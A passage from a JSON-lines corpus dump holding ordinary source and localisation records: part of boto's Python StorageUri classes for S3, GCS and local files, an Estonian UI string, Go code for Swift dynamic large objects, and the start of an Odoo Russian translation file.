self.scheme == 's3':\n from boto.s3.connection import S3Connection\n self.connection = S3Connection(access_key_id,\n secret_access_key,\n **connection_args)\n self.provider_pool[self.scheme] = self.connection\n elif self.scheme == 'gs':\n from boto.gs.connection import GSConnection\n # Use OrdinaryCallingFormat instead of boto-default\n # SubdomainCallingFormat because the latter changes the hostname\n # that's checked during cert validation for HTTPS connections,\n # which will fail cert validation (when cert validation is\n # enabled).\n #\n # The same is not true for S3's HTTPS certificates. In fact,\n # we don't want to do this for S3 because S3 requires the\n # subdomain to match the location of the bucket. If the proper\n # subdomain is not used, the server will return a 301 redirect\n # with no Location header.\n #\n # Note: the following import can't be moved up to the\n # start of this file else it causes a config import failure when\n # run from the resumable upload/download tests.\n from boto.s3.connection import OrdinaryCallingFormat\n connection_args['calling_format'] = OrdinaryCallingFormat()\n self.connection = GSConnection(access_key_id,\n secret_access_key,\n **connection_args)\n self.provider_pool[self.scheme] = self.connection\n elif self.scheme == 'file':\n from boto.file.connection import FileConnection\n self.connection = FileConnection(self)\n else:\n raise InvalidUriError('Unrecognized scheme \"%s\"' %\n self.scheme)\n self.connection.debug = self.debug\n return self.connection\n\n def has_version(self):\n return (issubclass(type(self), BucketStorageUri)\n and ((self.version_id is not None)\n or (self.generation is not None)))\n\n def delete_key(self, validate=False, headers=None, version_id=None,\n mfa_token=None):\n self._check_object_uri('delete_key')\n bucket = self.get_bucket(validate, headers)\n return bucket.delete_key(self.object_name, headers, version_id,\n mfa_token)\n\n def list_bucket(self, prefix='', delimiter='', headers=None,\n all_versions=False):\n self._check_bucket_uri('list_bucket')\n bucket = self.get_bucket(headers=headers)\n if all_versions:\n return (v for v in bucket.list_versions(\n prefix=prefix, delimiter=delimiter, headers=headers)\n if not isinstance(v, DeleteMarker))\n else:\n return bucket.list(prefix=prefix, delimiter=delimiter,\n headers=headers)\n\n def get_all_keys(self, validate=False, headers=None, prefix=None):\n bucket = self.get_bucket(validate, headers)\n return bucket.get_all_keys(headers)\n\n def get_bucket(self, validate=False, headers=None):\n self._check_bucket_uri('get_bucket')\n conn = self.connect()\n bucket = conn.get_bucket(self.bucket_name, validate, headers)\n self.check_response(bucket, 'bucket', self.uri)\n return bucket\n\n def get_key(self, validate=False, headers=None, version_id=None):\n self._check_object_uri('get_key')\n bucket = self.get_bucket(validate, headers)\n key = bucket.get_key(self.object_name, headers, version_id)\n self.check_response(key, 'key', self.uri)\n return key\n\n def new_key(self, validate=False, headers=None):\n self._check_object_uri('new_key')\n bucket = self.get_bucket(validate, headers)\n return bucket.new_key(self.object_name)\n\n def get_contents_to_stream(self, fp, headers=None, version_id=None):\n self._check_object_uri('get_key')\n self._warn_about_args('get_key', validate=False)\n key = self.get_key(None, headers)\n self.check_response(key, 'key', self.uri)\n return key.get_contents_to_file(fp, headers, version_id=version_id)\n\n def get_contents_to_file(self, fp, headers=None, cb=None, num_cb=10,\n torrent=False, version_id=None,\n res_download_handler=None, response_headers=None,\n hash_algs=None):\n self._check_object_uri('get_contents_to_file')\n key = self.get_key(None, headers)\n self.check_response(key, 'key', self.uri)\n if hash_algs:\n key.get_contents_to_file(fp, headers, cb, num_cb, torrent,\n version_id, res_download_handler,\n response_headers,\n hash_algs=hash_algs)\n else:\n key.get_contents_to_file(fp, headers, cb, num_cb, torrent,\n version_id, res_download_handler,\n response_headers)\n\n def get_contents_as_string(self, validate=False, headers=None, cb=None,\n num_cb=10, torrent=False, version_id=None):\n self._check_object_uri('get_contents_as_string')\n key = self.get_key(validate, headers)\n self.check_response(key, 'key', self.uri)\n return key.get_contents_as_string(headers, cb, num_cb, torrent,\n version_id)\n\n def acl_class(self):\n conn = self.connect()\n acl_class = conn.provider.acl_class\n self.check_response(acl_class, 'acl_class', self.uri)\n return acl_class\n\n def canned_acls(self):\n conn = self.connect()\n canned_acls = conn.provider.canned_acls\n self.check_response(canned_acls, 'canned_acls', self.uri)\n return canned_acls\n\n\nclass BucketStorageUri(StorageUri):\n \"\"\"\n StorageUri subclass that handles bucket storage providers.\n Callers should instantiate this class by calling boto.storage_uri().\n \"\"\"\n\n delim = '/'\n capabilities = set([]) # A set of additional capabilities.\n\n def __init__(self, scheme, bucket_name=None, object_name=None,\n debug=0, connection_args=None, suppress_consec_slashes=True,\n version_id=None, generation=None, is_latest=False):\n \"\"\"Instantiate a BucketStorageUri from scheme,bucket,object tuple.\n\n @type scheme: string\n @param scheme: URI scheme naming the storage provider (gs, s3, etc.)\n @type bucket_name: string\n @param bucket_name: bucket name\n @type object_name: string\n @param object_name: object name, excluding generation/version.\n @type debug: int\n @param debug: debug level to pass in to connection (range 0..2)\n @type connection_args: map\n @param connection_args: optional map containing args to be\n passed to {S3,GS}Connection constructor (e.g., to override\n https_connection_factory).\n @param suppress_consec_slashes: If provided, controls whether\n consecutive slashes will be suppressed in key paths.\n @param version_id: Object version id (S3-specific).\n @param generation: Object generation number (GCS-specific).\n @param is_latest: boolean indicating that a versioned object is the\n current version\n\n After instantiation the components are available in the following\n fields: scheme, bucket_name, object_name, version_id, generation,\n is_latest, versionless_uri, version_specific_uri, uri.\n Note: If instantiated without version info, the string representation\n for a URI stays versionless; similarly, if instantiated with version\n info, the string representation for a URI stays version-specific. If you\n call one of the uri.set_contents_from_xyz() methods, a specific object\n version will be created, and its version-specific URI string can be\n retrieved from version_specific_uri even if the URI was instantiated\n without version info.\n \"\"\"\n\n self.scheme = scheme\n self.bucket_name = bucket_name\n self.object_name = object_name\n self.debug = debug\n if connection_args:\n self.connection_args = connection_args\n self.suppress_consec_slashes = suppress_consec_slashes\n self.version_id = version_id\n self.generation = generation and int(generation)\n self.is_latest = is_latest\n self.is_version_specific = bool(self.generation) or bool(version_id)\n self._build_uri_strings()\n\n def _build_uri_strings(self):\n if self.bucket_name and self.object_name:\n self.versionless_uri = '%s://%s/%s' % (self.scheme, self.bucket_name,\n self.object_name)\n if self.generation:\n self.version_specific_uri = '%s#%s' % (self.versionless_uri,\n self.generation)\n elif self.version_id:\n self.version_specific_uri = '%s#%s' % (\n self.versionless_uri, self.version_id)\n if self.is_version_specific:\n self.uri = self.version_specific_uri\n else:\n self.uri = self.versionless_uri\n elif self.bucket_name:\n self.uri = ('%s://%s/' % (self.scheme, self.bucket_name))\n else:\n self.uri = ('%s://' % self.scheme)\n\n def _update_from_key(self, key):\n self._update_from_values(\n getattr(key, 'version_id', None),\n getattr(key, 'generation', None),\n getattr(key, 'is_latest', None),\n getattr(key, 'md5', None))\n\n def _update_from_values(self, version_id, generation, is_latest, md5):\n self.version_id = version_id\n self.generation = generation\n self.is_latest = is_latest\n self._build_uri_strings()\n self.md5 = md5\n\n def get_key(self, validate=False, headers=None, version_id=None):\n self._check_object_uri('get_key')\n bucket = self.get_bucket(validate, headers)\n if self.get_provider().name == 'aws':\n key = bucket.get_key(self.object_name, headers,\n version_id=(version_id or self.version_id))\n elif self.get_provider().name == 'google':\n key = bucket.get_key(self.object_name, headers,\n generation=self.generation)\n self.check_response(key, 'key', self.uri)\n return key\n\n def delete_key(self, validate=False, headers=None, version_id=None,\n mfa_token=None):\n self._check_object_uri('delete_key')\n bucket = self.get_bucket(validate, headers)\n if self.get_provider().name == 'aws':\n version_id = version_id or self.version_id\n return bucket.delete_key(self.object_name, headers, version_id,\n mfa_token)\n elif self.get_provider().name == 'google':\n return bucket.delete_key(self.object_name, headers,\n generation=self.generation)\n\n def clone_replace_name(self, new_name):\n \"\"\"Instantiate a BucketStorageUri from the current BucketStorageUri,\n but replacing the object_name.\n\n @type new_name: string\n @param new_name: new object name\n \"\"\"\n self._check_bucket_uri('clone_replace_name')\n return BucketStorageUri(\n self.scheme, bucket_name=self.bucket_name, object_name=new_name,\n debug=self.debug,\n suppress_consec_slashes=self.suppress_consec_slashes)\n\n def clone_replace_key(self, key):\n \"\"\"Instantiate a BucketStorageUri from the current BucketStorageUri, by\n replacing the object name with the object name and other metadata found\n in the given Key object (including generation).\n\n @type key: Key\n @param key: key for the new StorageUri to represent\n \"\"\"\n self._check_bucket_uri('clone_replace_key')\n version_id = None\n generation = None\n is_latest = False\n if hasattr(key, 'version_id'):\n version_id = key.version_id\n if hasattr(key, 'generation'):\n generation = key.generation\n if hasattr(key, 'is_latest'):\n is_latest = key.is_latest\n\n return BucketStorageUri(\n key.provider.get_provider_name(),\n bucket_name=key.bucket.name,\n object_name=key.name,\n debug=self.debug,\n suppress_consec_slashes=self.suppress_consec_slashes,\n version_id=version_id,\n generation=generation,\n is_latest=is_latest)\n\n def get_acl(self, validate=False, headers=None, version_id=None):\n \"\"\"returns a bucket's acl\"\"\"\n self._check_bucket_uri('get_acl')\n bucket = self.get_bucket(validate, headers)\n # This works for both bucket- and object- level ACLs (former passes\n # key_name=None):\n key_name = self.object_name or ''\n if self.get_provider().name == 'aws':\n version_id = version_id or self.version_id\n acl = bucket.get_acl(key_name, headers, version_id)\n else:\n acl = bucket.get_acl(key_name, headers, generation=self.generation)\n self.check_response(acl, 'acl', self.uri)\n return acl\n\n def get_def_acl(self, validate=False, headers=None):\n \"\"\"returns a bucket's default object acl\"\"\"\n self._check_bucket_uri('get_def_acl')\n bucket = self.get_bucket(validate, headers)\n acl = bucket.get_def_acl(headers)\n self.check_response(acl, 'acl', self.uri)\n return acl\n\n def get_cors(self, validate=False, headers=None):\n \"\"\"returns a bucket's CORS XML\"\"\"\n self._check_bucket_uri('get_cors')\n bucket = self.get_bucket(validate, headers)\n cors = bucket.get_cors(headers)\n self.check_response(cors, 'cors', self.uri)\n return cors\n\n def set_cors(self, cors, validate=False, headers=None):\n \"\"\"sets or updates a bucket's CORS XML\"\"\"\n self._check_bucket_uri('set_cors ')\n bucket = self.get_bucket(validate, headers)\n if self.scheme == 's3':\n bucket.set_cors(cors, headers)\n else:\n bucket.set_cors(cors.to_xml(), headers)\n\n def get_location(self, validate=False, headers=None):\n self._check_bucket_uri('get_location')\n bucket = self.get_bucket(validate, headers)\n return bucket.get_location()\n\n def get_storage_class(self, validate=False, headers=None):\n self._check_bucket_uri('get_storage_class')\n # StorageClass is defined as a bucket and object param for GCS, but\n # only as a key param for S3.\n if self.scheme != 'gs':\n raise ValueError('get_storage_class() not supported for %s '\n 'URIs.' % self.scheme)\n bucket = self.get_bucket(validate, headers)\n return bucket.get_storage_class()\n\n def set_storage_class(self, storage_class, validate=False, headers=None):\n \"\"\"Updates a bucket's storage class.\"\"\"\n self._check_bucket_uri('set_storage_class')\n # StorageClass is defined as a bucket and object param for GCS, but\n # only as a key param for S3.\n if self.scheme != 'gs':\n raise ValueError('set_storage_class() not supported for %s '\n 'URIs.' % self.scheme)\n bucket = self.get_bucket(validate, headers)\n bucket.set_storage_class(storage_class, headers)\n\n def get_subresource(self, subresource, validate=False, headers=None,\n version_id=None):\n self._check_bucket_uri('get_subresource')\n bucket = self.get_bucket(validate, headers)\n return bucket.get_subresource(subresource, self.object_name, headers,\n version_id)\n\n def add_group_email_grant(self, permission, email_address, recursive=False,\n validate=False, headers=None):\n self._check_bucket_uri('add_group_email_grant')\n if self.scheme != 'gs':\n raise ValueError('add_group_email_grant() not supported for %s '\n 'URIs.' % self.scheme)\n if self.object_name:\n if recursive:\n raise ValueError('add_group_email_grant() on key-ful URI cannot '\n 'specify recursive=True')\n key = self.get_key(validate, headers)\n self.check_response(key, 'key', self.uri)\n key.add_group_email_grant(permission, email_address, headers)\n elif self.bucket_name:\n bucket = self.get_bucket(validate, headers)\n bucket.add_group_email_grant(permission, email_address, recursive,\n headers)\n else:\n raise InvalidUriError('add_group_email_grant() on bucket-less URI '\n '%s' % self.uri)\n\n def add_email_grant(self, permission, email_address, recursive=False,\n validate=False, headers=None):\n self._check_bucket_uri('add_email_grant')\n if not self.object_name:\n bucket = self.get_bucket(validate, headers)\n bucket.add_email_grant(permission, email_address, recursive,\n headers)\n else:\n key = self.get_key(validate, headers)\n self.check_response(key, 'key', self.uri)\n key.add_email_grant(permission, email_address)\n\n def add_user_grant(self, permission, user_id, recursive=False,\n validate=False, headers=None):\n self._check_bucket_uri('add_user_grant')\n if not self.object_name:\n bucket = self.get_bucket(validate, headers)\n bucket.add_user_grant(permission, user_id, recursive, headers)\n else:\n key = self.get_key(validate, headers)\n self.check_response(key, 'key', self.uri)\n key.add_user_grant(permission, user_id)\n\n def list_grants(self, headers=None):\n self._check_bucket_uri('list_grants ')\n bucket = self.get_bucket(headers)\n return bucket.list_grants(headers)\n\n def is_file_uri(self):\n \"\"\"Returns True if this URI names a file or directory.\"\"\"\n return False\n\n def is_cloud_uri(self):\n \"\"\"Returns True if this URI names a bucket or object.\"\"\"\n return True\n\n def names_container(self):\n \"\"\"\n Returns True if this URI names a directory or bucket. Will return\n False for bucket subdirs; providing bucket subdir semantics needs to\n be done by the caller (like gsutil does).\n \"\"\"\n return bool(not self.object_name)\n\n def names_singleton(self):\n \"\"\"Returns True if this URI names a file or object.\"\"\"\n return bool(self.object_name)\n\n def names_directory(self):\n \"\"\"Returns True if this URI names a directory.\"\"\"\n return False\n\n def names_provider(self):\n \"\"\"Returns True if this URI names a provider.\"\"\"\n return bool(not self.bucket_name)\n\n def names_bucket(self):\n \"\"\"Returns True if this URI names a bucket.\"\"\"\n return bool(self.bucket_name) and bool(not self.object_name)\n\n def names_file(self):\n \"\"\"Returns True if this URI names a file.\"\"\"\n return False\n\n def names_object(self):\n \"\"\"Returns True if this URI names an object.\"\"\"\n return self.names_singleton()\n\n def is_stream(self):\n \"\"\"Returns True if this URI represents input/output stream.\"\"\"\n return False\n\n def create_bucket(self, headers=None, location='', policy=None,\n storage_class=None):\n self._check_bucket_uri('create_bucket ')\n conn = self.connect()\n # Pass storage_class param only if this is a GCS bucket. (In S3 the\n # storage class is specified on the key object.)\n if self.scheme == 'gs':\n return conn.create_bucket(self.bucket_name, headers, location, policy,\n storage_class)\n else:\n return conn.create_bucket(self.bucket_name, headers, location, policy)\n\n def delete_bucket(self, headers=None):\n self._check_bucket_uri('delete_bucket')\n conn = self.connect()\n return conn.delete_bucket(self.bucket_name, headers)\n\n def get_all_buckets(self, headers=None):\n conn = self.connect()\n return conn.get_all_buckets(headers)\n\n def get_provider(self):\n conn = self.connect()\n provider = conn.provider\n self.check_response(provider, 'provider', self.uri)\n return provider\n\n def set_acl(self, acl_or_str, key_name='', validate=False, headers=None,\n version_id=None, if_generation=None, if_metageneration=None):\n \"\"\"Sets or updates a bucket's ACL.\"\"\"\n self._check_bucket_uri('set_acl')\n key_name = key_name or self.object_name or ''\n bucket = self.get_bucket(validate, headers)\n if self.generation:\n bucket.set_acl(\n acl_or_str, key_name, headers, generation=self.generation,\n if_generation=if_generation, if_metageneration=if_metageneration)\n else:\n version_id = version_id or self.version_id\n bucket.set_acl(acl_or_str, key_name, headers, version_id)\n\n def set_xml_acl(self, xmlstring, key_name='', validate=False, headers=None,\n version_id=None, if_generation=None, if_metageneration=None):\n \"\"\"Sets or updates a bucket's ACL with an XML string.\"\"\"\n self._check_bucket_uri('set_xml_acl')\n key_name = key_name or self.object_name or ''\n bucket = self.get_bucket(validate, headers)\n if self.generation:\n bucket.set_xml_acl(\n xmlstring, key_name, headers, generation=self.generation,\n if_generation=if_generation, if_metageneration=if_metageneration)\n else:\n version_id = version_id or self.version_id\n bucket.set_xml_acl(xmlstring, key_name, headers,\n version_id=version_id)\n\n def set_def_xml_acl(self, xmlstring, validate=False, headers=None):\n \"\"\"Sets or updates a bucket's default object ACL with an XML string.\"\"\"\n self._check_bucket_uri('set_def_xml_acl')\n self.get_bucket(validate, headers).set_def_xml_acl(xmlstring, headers)\n\n def set_def_acl(self, acl_or_str, validate=False, headers=None,\n version_id=None):\n \"\"\"Sets or updates a bucket's default object ACL.\"\"\"\n self._check_bucket_uri('set_def_acl')\n self.get_bucket(validate, headers).set_def_acl(acl_or_str, headers)\n\n def set_canned_acl(self, acl_str, validate=False, headers=None,\n version_id=None):\n \"\"\"Sets or updates a bucket's acl to a predefined (canned) value.\"\"\"\n self._check_object_uri('set_canned_acl')\n self._warn_about_args('set_canned_acl', version_id=version_id)\n key = self.get_key(validate, headers)\n self.check_response(key, 'key', self.uri)\n key.set_canned_acl(acl_str, headers)\n\n def set_def_canned_acl(self, acl_str, validate=False, headers=None,\n version_id=None):\n \"\"\"Sets or updates a bucket's default object acl to a predefined\n (canned) value.\"\"\"\n self._check_bucket_uri('set_def_canned_acl ')\n key = self.get_key(validate, headers)\n self.check_response(key, 'key', self.uri)\n key.set_def_canned_acl(acl_str, headers, version_id)\n\n def set_subresource(self, subresource, value, validate=False, headers=None,\n version_id=None):\n self._check_bucket_uri('set_subresource')\n bucket = self.get_bucket(validate, headers)\n bucket.set_subresource(subresource, value, self.object_name, headers,\n version_id)\n\n def set_contents_from_string(self, s, headers=None, replace=True,\n cb=None, num_cb=10, policy=None, md5=None,\n reduced_redundancy=False):\n self._check_object_uri('set_contents_from_string')\n key = self.new_key(headers=headers)\n if self.scheme == 'gs':\n if reduced_redundancy:\n sys.stderr.write('Warning: GCS does not support '\n 'reduced_redundancy; argument ignored by '\n 'set_contents_from_string')\n result = key.set_contents_from_string(\n s, headers, replace, cb, num_cb, policy, md5)\n else:\n result = key.set_contents_from_string(\n s, headers, replace, cb, num_cb, policy, md5,\n reduced_redundancy)\n self._update_from_key(key)\n return result\n\n def set_contents_from_file(self, fp, headers=None, replace=True, cb=None,\n num_cb=10, policy=None, md5=None, size=None,\n rewind=False, res_upload_handler=None):\n self._check_object_uri('set_contents_from_file')\n key = self.new_key(headers=headers)\n if self.scheme == 'gs':\n result = key.set_contents_from_file(\n fp, headers, replace, cb, num_cb, policy, md5, size=size,\n rewind=rewind, res_upload_handler=res_upload_handler)\n if res_upload_handler:\n self._update_from_values(None, res_upload_handler.generation,\n None, md5)\n else:\n self._warn_about_args('set_contents_from_file',\n res_upload_handler=res_upload_handler)\n result = key.set_contents_from_file(\n fp, headers, replace, cb, num_cb, policy, md5, size=size,\n rewind=rewind)\n self._update_from_key(key)\n return result\n\n def set_contents_from_stream(self, fp, headers=None, replace=True, cb=None,\n policy=None, reduced_redundancy=False):\n self._check_object_uri('set_contents_from_stream')\n dst_key = self.new_key(False, headers)\n result = dst_key.set_contents_from_stream(\n fp, headers, replace, cb, policy=policy,\n reduced_redundancy=reduced_redundancy)\n self._update_from_key(dst_key)\n return result\n\n def copy_key(self, src_bucket_name, src_key_name, metadata=None,\n src_version_id=None, storage_class='STANDARD',\n preserve_acl=False, encrypt_key=False, headers=None,\n query_args=None, src_generation=None):\n \"\"\"Returns newly created key.\"\"\"\n self._check_object_uri('copy_key')\n dst_bucket = self.get_bucket(validate=False, headers=headers)\n if src_generation:\n return dst_bucket.copy_key(\n new_key_name=self.object_name,\n src_bucket_name=src_bucket_name,\n src_key_name=src_key_name, metadata=metadata,\n storage_class=storage_class, preserve_acl=preserve_acl,\n encrypt_key=encrypt_key, headers=headers, query_args=query_args,\n src_generation=src_generation)\n else:\n return dst_bucket.copy_key(\n new_key_name=self.object_name,\n src_bucket_name=src_bucket_name, src_key_name=src_key_name,\n metadata=metadata, src_version_id=src_version_id,\n storage_class=storage_class, preserve_acl=preserve_acl,\n encrypt_key=encrypt_key, headers=headers, query_args=query_args)\n\n def enable_logging(self, target_bucket, target_prefix=None, validate=False,\n headers=None, version_id=None):\n self._check_bucket_uri('enable_logging')\n bucket = self.get_bucket(validate, headers)\n bucket.enable_logging(target_bucket, target_prefix, headers=headers)\n\n def disable_logging(self, validate=False, headers=None, version_id=None):\n self._check_bucket_uri('disable_logging')\n bucket = self.get_bucket(validate, headers)\n bucket.disable_logging(headers=headers)\n\n def get_logging_config(self, validate=False, headers=None, version_id=None):\n self._check_bucket_uri('get_logging_config')\n bucket = self.get_bucket(validate, headers)\n return bucket.get_logging_config(headers=headers)\n\n def set_website_config(self, main_page_suffix=None, error_key=None,\n validate=False, headers=None):\n self._check_bucket_uri('set_website_config')\n bucket = self.get_bucket(validate, headers)\n if not (main_page_suffix or error_key):\n bucket.delete_website_configuration(headers)\n else:\n bucket.configure_website(main_page_suffix, error_key, headers)\n\n def get_website_config(self, validate=False, headers=None):\n self._check_bucket_uri('get_website_config')\n bucket = self.get_bucket(validate, headers)\n return bucket.get_website_configuration(headers)\n\n def get_versioning_config(self, headers=None):\n self._check_bucket_uri('get_versioning_config')\n bucket = self.get_bucket(False, headers)\n return bucket.get_versioning_status(headers)\n\n def configure_versioning(self, enabled, headers=None):\n self._check_bucket_uri('configure_versioning')\n bucket = self.get_bucket(False, headers)\n return bucket.configure_versioning(enabled, headers)\n\n def set_metadata(self, metadata_plus, metadata_minus, preserve_acl,\n headers=None):\n return self.get_key(False).set_remote_metadata(metadata_plus,\n metadata_minus,\n preserve_acl,\n headers=headers)\n\n def compose(self, components, content_type=None, headers=None):\n self._check_object_uri('compose')\n component_keys = []\n for suri in components:\n component_keys.append(suri.new_key())\n component_keys[-1].generation = suri.generation\n self.generation = self.new_key().compose(\n component_keys, content_type=content_type, headers=headers)\n self._build_uri_strings()\n return self\n\n def get_lifecycle_config(self, validate=False, headers=None):\n \"\"\"Returns a bucket's lifecycle configuration.\"\"\"\n self._check_bucket_uri('get_lifecycle_config')\n bucket = self.get_bucket(validate, headers)\n lifecycle_config = bucket.get_lifecycle_config(headers)\n self.check_response(lifecycle_config, 'lifecycle', self.uri)\n return lifecycle_config\n\n def configure_lifecycle(self, lifecycle_config, validate=False,\n headers=None):\n \"\"\"Sets or updates a bucket's lifecycle configuration.\"\"\"\n self._check_bucket_uri('configure_lifecycle')\n bucket = self.get_bucket(validate, headers)\n bucket.configure_lifecycle(lifecycle_config, headers)\n\n def exists(self, headers=None):\n \"\"\"Returns True if the object exists or False if it doesn't\"\"\"\n if not self.object_name:\n raise InvalidUriError('exists on object-less URI (%s)' % self.uri)\n bucket = self.get_bucket()\n key = bucket.get_key(self.object_name, headers=headers)\n return bool(key)\n\n\nclass FileStorageUri(StorageUri):\n \"\"\"\n StorageUri subclass that handles files in the local file system.\n Callers should instantiate this class by calling boto.storage_uri().\n\n See file/README about how we map StorageUri operations onto a file system.\n \"\"\"\n\n delim = os.sep\n\n def __init__(self, object_name, debug, is_stream=False):\n \"\"\"Instantiate a FileStorageUri from a path name.\n\n @type object_name: string\n @param object_name: object name\n @type debug: boolean\n @param debug: whether to enable debugging on this StorageUri\n\n After instantiation the components are available in the following\n fields: uri, scheme, bucket_name (always blank for this \"anonymous\"\n bucket), object_name.\n \"\"\"\n\n self.scheme = 'file'\n self.bucket_name = ''\n self.object_name = object_name\n self.uri = 'file://' + object_name\n self.debug = debug\n self.stream = is_stream\n\n def clone_replace_name(self, new_name):\n \"\"\"Instantiate a FileStorageUri from the current FileStorageUri,\n but replacing the object_name.\n\n @type new_name: string\n @param new_name: new object name\n \"\"\"\n return FileStorageUri(new_name, self.debug, self.stream)\n\n def is_file_uri(self):\n \"\"\"Returns True if this URI names a file or directory.\"\"\"\n return True\n\n def is_cloud_uri(self):\n \"\"\"Returns True if this URI names a bucket or object.\"\"\"\n return False\n\n def names_container(self):\n \"\"\"Returns True if this URI names a directory or bucket.\"\"\"\n return self.names_directory()\n\n def names_singleton(self):\n \"\"\"Returns True if this URI names a file (or stream) or object.\"\"\"\n return not self.names_container()\n\n def names_directory(self):\n \"\"\"Returns True if this URI names a directory.\"\"\"\n if self.stream:\n return False\n return os.path.isdir(self.object_name)\n\n def names_provider(self):\n \"\"\"Returns True if this URI names a provider.\"\"\"\n return False\n\n def names_bucket(self):\n \"\"\"Returns True if this URI names a bucket.\"\"\"\n return False\n\n def names_file(self):\n \"\"\"Returns True if this URI names a file.\"\"\"\n return self.names_singleton()\n\n def names_object(self):\n \"\"\"Returns True if this URI names an object.\"\"\"\n return False\n\n def is_stream(self):\n \"\"\"Returns True if this URI represents input/output stream.\n \"\"\"\n return bool(self.stream)\n\n def close(self):\n \"\"\"Closes the underlying file.\n \"\"\"\n self.get_key().close()\n\n def exists(self, _headers_not_used=None):\n \"\"\"Returns True if the file exists or False if it doesn't\"\"\"\n # The _headers_not_used parameter is ignored. It is only there to ensure\n # that this method's signature is identical to the exists method on the\n # BucketStorageUri class.\n return os.path.exists(self.object_name)\n"} {"text": "\n\n Kasuta audio CD radasid\n\n"} {"text": "package swift\n\nimport (\n\t\"os\"\n)\n\n// DynamicLargeObjectCreateFile represents an open static large object\ntype DynamicLargeObjectCreateFile struct {\n\tlargeObjectCreateFile\n}\n\n// DynamicLargeObjectCreateFile creates a dynamic large object\n// returning an object which satisfies io.Writer, io.Seeker, io.Closer\n// and io.ReaderFrom. The flags are as passes to the\n// largeObjectCreate method.\nfunc (c *Connection) DynamicLargeObjectCreateFile(opts *LargeObjectOpts) (LargeObjectFile, error) {\n\tlo, err := c.largeObjectCreate(opts)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn withBuffer(opts, &DynamicLargeObjectCreateFile{\n\t\tlargeObjectCreateFile: *lo,\n\t}), nil\n}\n\n// DynamicLargeObjectCreate creates or truncates an existing dynamic\n// large object returning a writeable object. This sets opts.Flags to\n// an appropriate value before calling DynamicLargeObjectCreateFile\nfunc (c *Connection) DynamicLargeObjectCreate(opts *LargeObjectOpts) (LargeObjectFile, error) {\n\topts.Flags = os.O_TRUNC | os.O_CREATE\n\treturn c.DynamicLargeObjectCreateFile(opts)\n}\n\n// DynamicLargeObjectDelete deletes a dynamic large object and all of its segments.\nfunc (c *Connection) DynamicLargeObjectDelete(container string, path string) error {\n\treturn c.LargeObjectDelete(container, path)\n}\n\n// DynamicLargeObjectMove moves a dynamic large object from srcContainer, srcObjectName to dstContainer, dstObjectName\nfunc (c *Connection) DynamicLargeObjectMove(srcContainer string, srcObjectName string, dstContainer string, dstObjectName string) error {\n\tinfo, headers, err := c.Object(dstContainer, srcObjectName)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tsegmentContainer, segmentPath := parseFullPath(headers[\"X-Object-Manifest\"])\n\tif err := c.createDLOManifest(dstContainer, dstObjectName, segmentContainer+\"/\"+segmentPath, info.ContentType); err != nil {\n\t\treturn err\n\t}\n\n\tif err := c.ObjectDelete(srcContainer, srcObjectName); err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}\n\n// createDLOManifest creates a dynamic large object manifest\nfunc (c *Connection) createDLOManifest(container string, objectName string, prefix string, contentType string) error {\n\theaders := make(Headers)\n\theaders[\"X-Object-Manifest\"] = prefix\n\tmanifest, err := c.ObjectCreate(container, objectName, false, \"\", contentType, headers)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif err := manifest.Close(); err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}\n\n// Close satisfies the io.Closer interface\nfunc (file *DynamicLargeObjectCreateFile) Close() error {\n\treturn file.Flush()\n}\n\nfunc (file *DynamicLargeObjectCreateFile) Flush() error {\n\terr := file.conn.createDLOManifest(file.container, file.objectName, file.segmentContainer+\"/\"+file.prefix, file.contentType)\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn file.conn.waitForSegmentsToShowUp(file.container, file.objectName, file.Size())\n}\n\nfunc (c *Connection) getAllDLOSegments(segmentContainer, segmentPath string) ([]Object, error) {\n\t//a simple container listing works 99.9% of the time\n\tsegments, err := c.ObjectsAll(segmentContainer, &ObjectsOpts{Prefix: segmentPath})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\thasObjectName := make(map[string]struct{})\n\tfor _, segment := range segments {\n\t\thasObjectName[segment.Name] = struct{}{}\n\t}\n\n\t//The container listing might be outdated (i.e. not contain all existing\n\t//segment objects yet) because of temporary inconsistency (Swift is only\n\t//eventually consistent!). Check its completeness.\n\tsegmentNumber := 0\n\tfor {\n\t\tsegmentNumber++\n\t\tsegmentName := getSegment(segmentPath, segmentNumber)\n\t\tif _, seen := hasObjectName[segmentName]; seen {\n\t\t\tcontinue\n\t\t}\n\n\t\t//This segment is missing in the container listing. Use a more reliable\n\t\t//request to check its existence. (HEAD requests on segments are\n\t\t//guaranteed to return the correct metadata, except for the pathological\n\t\t//case of an outage of large parts of the Swift cluster or its network,\n\t\t//since every segment is only written once.)\n\t\tsegment, _, err := c.Object(segmentContainer, segmentName)\n\t\tswitch err {\n\t\tcase nil:\n\t\t\t//found new segment -> add it in the correct position and keep\n\t\t\t//going, more might be missing\n\t\t\tif segmentNumber <= len(segments) {\n\t\t\t\tsegments = append(segments[:segmentNumber], segments[segmentNumber-1:]...)\n\t\t\t\tsegments[segmentNumber-1] = segment\n\t\t\t} else {\n\t\t\t\tsegments = append(segments, segment)\n\t\t\t}\n\t\t\tcontinue\n\t\tcase ObjectNotFound:\n\t\t\t//This segment is missing. Since we upload segments sequentially,\n\t\t\t//there won't be any more segments after it.\n\t\t\treturn segments, nil\n\t\tdefault:\n\t\t\treturn nil, err //unexpected error\n\t\t}\n\t}\n}\n"} {"text": "# Translation of Odoo Server.\n# This file contains the translation of the following modules:\n# \t* hr_recruitment_survey\n# \n# Translators:\n# Vasiliy Korobatov , 2019\n# Martin Trigaux, 2019\n# \nmsgid \"\"\nmsgstr \"\"\n\"Project-Id-Version: Odoo Server 13.0\\n\"\n\"Report-Msgid-Bugs-To: \\n\"\n\"POT-Creation-Date: 2019-10-07 07:12+0000\\n\"\n\"PO-Revision-Date: 2019-08-26 09:10+0000\\n\"\n\"Last-Translator: Martin Trigaux, 2019\\n\"\n\"Language-Team: Russian (https://www.transifex.com/odoo/teams/41243/ru/)\\n\"\n\"MIME-Version: 1.0\\n\"\n\"Content-Type: text/plain; charset=UTF-8\\n\"\n\"Content-Transfer-Encoding: \\n\"\n\"Language: ru\\n\"\n\"Plural-Forms: nplurals=4; plural=(n%10==1 && n%100!=11 ? 0 : n%10>=2 && n%10<=4 && (n%100<12 || n%100>14) ? 1 : n%10==0 || (n%10>=5 && n%10<=9) 